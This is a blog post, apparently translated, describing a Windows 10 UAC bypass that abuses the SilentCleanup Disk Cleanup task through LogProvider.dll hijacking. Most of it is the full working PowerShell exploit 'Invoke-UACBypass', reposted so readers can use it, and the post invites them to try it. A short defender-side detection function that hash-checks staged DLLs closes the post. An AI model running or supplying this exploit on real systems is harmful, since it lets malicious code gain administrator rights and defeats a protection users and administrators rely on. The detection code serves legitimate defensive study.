
BypassUac On Win10 Using Disk Cleanup

I recently saw a UAC bypass technique shared on enigma0x3's blog that abuses the Disk Cleanup scheduled task. I thought it was quite good, so I'm sharing it here. The original post is here: click here
There are already plenty of UAC bypass tools; one very good one is UACME.

Here is a brief explanation of how the Disk Cleanup UAC bypass works.

Windows 10 has a scheduled task named SilentCleanup, located at \Microsoft\Windows\DiskCleanup.

This scheduled task runs its program with highest privileges, yet starting the task does not require highest privileges.

When the task executes it runs cleanmgr.exe, which creates a new folder "C:\Users\<username>\AppData\Local\Temp\<GUID>" and copies dismhost.exe, together with the DLLs it uses, into that folder.

When dismhost.exe runs it loads the DLLs it needs. Because the current directory is under %TEMP%, DLL hijacking is entirely possible. Testing found that LogProvider.dll is the last DLL to be loaded, so it can be used: simply replace this DLL with our own malicious DLL, and when the scheduled task runs, our DLL is loaded, achieving the UAC bypass. To trigger the bypass immediately, WMI can be used to run the scheduled task. The author has already published an exploit script, link: BypassUAC; test DLL link: MessageBox

Try it out if you're interested.

The author's code is blocked from where I am, so I've pasted it below:

```powershell
function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.PARAMETER DllPath

Specifies the path to the DLL you want executed in a high integrity context. Be mindful of the architecture of the DLL. It must match that of %SystemRoot%\System32\Dism\LogProvider.dll.

.EXAMPLE

Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\Win10UACBypass\PrivescTest.dll

.EXAMPLE

Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\TotallyLegit.txt -Verbose

The DllPath can have any extension as long as the file itself is a DLL.
#>

    [CmdletBinding()]
    [OutputType([System.IO.FileInfo])]
    Param (
        [Parameter(Mandatory = $True)]
        [String]
        [ValidateScript({ Test-Path $_ })]
        $DllPath
    )

    $PrivescAction = {
        $ReplacementDllPath = $Event.MessageData.DllPath

        # The newly created GUID folder
        $DismHostFolder = $EventArgs.NewEvent.TargetInstance.Name

        $OriginalPreference = $VerbosePreference

        # Force -Verbose to display in the event
        if ($Event.MessageData.VerboseSet -eq $True) {
            $VerbosePreference = 'Continue'
        }

        Write-Verbose "DismHost folder created in $DismHostFolder"
        Write-Verbose "$ReplacementDllPath to $DismHostFolder\LogProvider.dll"

        try {
            $FileInfo = Copy-Item -Path $ReplacementDllPath -Destination "$DismHostFolder\LogProvider.dll" -Force -PassThru -ErrorAction Stop
        } catch {
            Write-Warning "Error copying file! Message: $_"
        }

        # Restore the event preference
        $VerbosePreference = $OriginalPreference

        if ($FileInfo) {
            # Trigger Wait-Event to return and indicate success.
            New-Event -SourceIdentifier 'DllPlantedSuccess' -MessageData $FileInfo
        }
    }

    $VerboseSet = $False
    if ($PSBoundParameters['Verbose']) { $VerboseSet = $True }

    $MessageData = New-Object -TypeName PSObject -Property @{
        DllPath = $DllPath
        VerboseSet = $VerboseSet # Pass the verbose preference to the scriptblock since
                                 # event scriptblocks will not automatically honor -Verbose.
    }

    $TempDrive = $Env:TEMP.Substring(0,2)

    # Trigger the DLL dropper with the following conditions:
    #  1) A directory is created - i.e. new Win32_Directory instance
    #  2) The directory created is created under %TEMP%
    #  3) The directory name is in the form of a GUID
    $TempFolderCreationEvent = "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA `"Win32_Directory`" AND TargetInstance.Drive = `"$TempDrive`" AND TargetInstance.Path = `"$($Env:TEMP.Substring(2).Replace('\', '\\'))\\`" AND TargetInstance.FileName LIKE `"________-____-____-____-____________`""

    $TempFolderWatcher = Register-WmiEvent -Query $TempFolderCreationEvent -Action $PrivescAction -MessageData $MessageData

    # We need to jump through these hoops to properly capture stdout and stderr of schtasks.
    $StartInfo = New-Object Diagnostics.ProcessStartInfo
    $StartInfo.FileName = 'schtasks'
    $StartInfo.Arguments = '/Run /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup" /I'
    $StartInfo.RedirectStandardError = $True
    $StartInfo.RedirectStandardOutput = $True
    $StartInfo.UseShellExecute = $False
    $Process = New-Object Diagnostics.Process
    $Process.StartInfo = $StartInfo
    $null = $Process.Start()
    $Process.WaitForExit()
    $Stdout = $Process.StandardOutput.ReadToEnd().Trim()
    $Stderr = $Process.StandardError.ReadToEnd().Trim()

    if ($Stderr) {
        Unregister-Event -SubscriptionId $TempFolderWatcher.Id
        throw "SilentCleanup task failed to execute. Error message: $Stderr"
    } else {
        if ($Stdout.Contains('is currently running')) {
            Unregister-Event -SubscriptionId $TempFolderWatcher.Id
            Write-Warning 'SilentCleanup task is already running. Please wait until the task has completed.'
        }

        Write-Verbose "SilentCleanup task executed successfully. Message: $Stdout"
    }

    $PayloadExecutedEvent = Wait-Event -SourceIdentifier 'DllPlantedSuccess' -Timeout 10

    Unregister-Event -SubscriptionId $TempFolderWatcher.Id

    if ($PayloadExecutedEvent) {
        Write-Verbose 'UAC bypass was successful!'

        # Output the file info for the DLL that was planted
        $PayloadExecutedEvent.MessageData

        $PayloadExecutedEvent | Remove-Event
    } else {
        # The event timed out.
        Write-Error 'UAC bypass failed. The DLL was not planted in its target.'
    }
}
```
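As an added defender-side check (my own code, not part of the original post or the authors' script): the function below records the SilentCleanup task's run level and scans %TEMP% for GUID-named DismHost staging folders whose LogProvider.dll does not hash-match the system copy in %SystemRoot%\System32\Dism. It assumes Windows 10 with PowerShell 5.1 and the ScheduledTasks module; the function and variable names are my own.

```powershell
# Added defender-side check; not from the original post or the authors' script.
# Assumes Windows 10, PowerShell 5.1+, ScheduledTasks module. Names are my own.
function Test-DismHostStaging {
    [CmdletBinding()]
    param (
        # Folder that cleanmgr.exe / DismHost.exe stages into (per the post: %TEMP%\<GUID>)
        [String]$TempRoot = $Env:TEMP,
        # Known-good copy the staged LogProvider.dll must match byte-for-byte
        [String]$ReferenceDll = "$Env:SystemRoot\System32\Dism\LogProvider.dll"
    )

    $guidPattern = '^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$'   # -match is case-insensitive
    $refHash = (Get-FileHash -Path $ReferenceDll -Algorithm SHA256).Hash

    # Record the task that runs with highest privileges but can be started from medium integrity
    $task = Get-ScheduledTask -TaskPath '\Microsoft\Windows\DiskCleanup\' `
                              -TaskName 'SilentCleanup' -ErrorAction SilentlyContinue
    if ($task) {
        Write-Verbose ("SilentCleanup RunLevel={0} State={1}" -f $task.Principal.RunLevel, $task.State)
    }

    Get-ChildItem -Path $TempRoot -Directory -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -match $guidPattern } |
        ForEach-Object {
            $dll = Join-Path $_.FullName 'LogProvider.dll'
            if (-not (Test-Path $dll)) { return }   # folder may hold only DismHost.exe so far

            $hash = (Get-FileHash -Path $dll -Algorithm SHA256).Hash
            $sig  = Get-AuthenticodeSignature -FilePath $dll

            [PSCustomObject]@{
                Folder          = $_.FullName
                LastWrite       = (Get-Item $dll).LastWriteTime
                HashMatchesRef  = ($hash -eq $refHash)
                # Informational only: a catalog-signed system copy may carry no embedded signature
                SignatureStatus = $sig.Status
                Signer          = $sig.SignerCertificate.Subject
                # The hijack replaces LogProvider.dll in the staging folder, so a mismatch is the artifact
                Suspicious      = ($hash -ne $refHash)
            }
        }
}

# Example usage: report only staging folders whose LogProvider.dll is not the system copy
Test-DismHostStaging -Verbose | Where-Object { $_.Suspicious } | Format-List
```

The staging folder is created for each run of the task, so the check is most useful right after SilentCleanup has fired or when scheduled to run alongside it.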